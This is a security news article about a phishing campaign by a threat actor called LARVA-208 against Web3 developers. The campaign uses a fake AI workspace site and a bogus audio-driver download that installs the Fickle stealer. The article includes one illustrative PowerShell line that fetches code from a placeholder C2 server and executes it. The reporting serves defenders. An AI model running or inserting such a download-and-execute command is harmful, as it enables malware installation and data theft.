New Web3 Phishing Attack Leverages Fake AI Platforms to Steal Usernames and Passwords

A sophisticated phishing campaign targeting Web3 developers has emerged, exploiting the growing interest in artificial intelligence platforms to deliver credential-stealing malware.

The threat actor LARVA-208, previously known for targeting IT staff through phone-based social engineering, has pivoted to focus on blockchain developers using a meticulously crafted fake AI workspace platform.

The attack begins with seemingly legitimate job offers or portfolio review requests sent to Web3 developers, directing them to fraudulent AI Company applications.

These communications leverage the MITRE ATT&CK technique T1566.002 (Spearphishing Link) to lure victims into accessing malicious platforms using unique invitation codes and email addresses.

Once victims engage with the fake platform, they encounter a deceptive error message claiming their audio drivers are outdated or missing, prompting them to download what appears to be a genuine Realtek HD Audio Driver.

Catalyst analysts identified that LARVA-208 has strategically created a convincing replica of the legitimate Teampilot AI workspace platform through their malicious domain “norlax.ai.”

This domain typosquatting technique (T1583.001 – Domains) creates a nearly identical interface to deceive unsuspecting developers who may be familiar with legitimate AI collaboration tools.

The downloaded “driver” is actually sophisticated malware that executes embedded PowerShell commands (T1059.001 – PowerShell) to retrieve and deploy the Fickle stealer from LARVA-208’s command and control infrastructure.

The PowerShell execution can be represented as:-

# Simplified representation of the malicious payload execution
Invoke-WebRequest -Uri "C2_SERVER_URL" | Invoke-Expression

Advanced Data Exfiltration Capabilities

The Fickle stealer demonstrates comprehensive information-gathering capabilities, systematically harvesting device identification data, hardware specifications, operating system details, and geolocation information including IP addresses and geographic locations.

The malware catalogs installed software, monitors active processes, and transmits all collected intelligence to LARVA-208’s command and control servers (T1583.004 – Server), which are hosted through FFv2’s bulletproof hosting service.

Security researchers have directly attributed this campaign to the broader Luminous Mantis threat group, indicating a coordinated effort to expand beyond traditional IT targeting into the lucrative Web3 developer ecosystem.

Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams -> Try ANY.RUN Now